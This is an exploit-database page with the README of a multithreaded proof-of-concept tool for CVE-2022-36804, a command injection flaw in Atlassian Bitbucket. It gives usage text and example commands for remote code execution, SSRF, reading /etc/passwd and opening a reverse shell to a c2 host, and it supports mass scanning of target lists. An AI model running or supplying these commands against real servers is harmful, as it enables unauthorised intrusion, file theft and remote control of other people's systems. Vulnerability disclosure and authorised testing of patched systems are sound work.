Exploit for Command Injection in Atlassian Bitbucket exploit

Share

## https://sploitus.com/exploit?id=93E1AD8B-C5DE-5A5E-86E3-5BDFA59A047A # CVE-2022-36804-PoC Multithreaded exploit script for CVE-2022-36804 affecting (most) BitBucket versions &lt;8.3.1 See the full advisory here https://jira.atlassian.com/browse/BSERV-13438 All credit to [TheGrandPew](https://twitter.com/TheGrandPew) for discovery The script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances. The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools. Do not use for malicious purposes. ## Usage ```bash usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT] [--skip-check] [-t THREADS] [-v] repos [repos ...] CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1 optional arguments: -h, --help show this help message and exit required arguments: repos Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on optional arguments: --auth-cookie AUTH_COOKIE Authentication cookie 'BITBUCKETSESSIONID' value for private repositories --proxy PROXY HTTP Proxy: <http/https>://<ip>:<port> -e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell} Exploit to perform --cmd CMD Command to execute for the 'rce' exploit (curl http://example.com) --knary KNARY Knary to respond too via DNS for the 'ssrf' exploit --server-file SERVER_FILE Server file to download for the 'download' exploit (/etc/passwd) --host HOST Hostname or IP address of c2 for the 'rev_shell' exploit --port PORT Port of the c2 for the 'rev_shell' exploit --skip-check Skip vulnerability checking stage -t THREADS, --threads THREADS Worker Threads -v, --verbose Increase output verbosity level ``` ### Exploit modes #### Check > Single Host > > `CVE-2022-36804.py http://bitbucket.local:7990/` > > Multiple Hosts and piping vulnerable hosts and repositories exploited to file > > `CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts` #### RCE (Remote Code Execution) > `CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/` #### SSRF (Server-Side Request Forgery) > Perform a DNS request to the specified knary > > `CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/` #### Download > Download a repository with the target file `/etc/passwd`, this will save the compressed repository to a randomised file name. > > `CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/` #### Rev_shell (Generates a reverse sh shell to the specified host and port) > `CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/`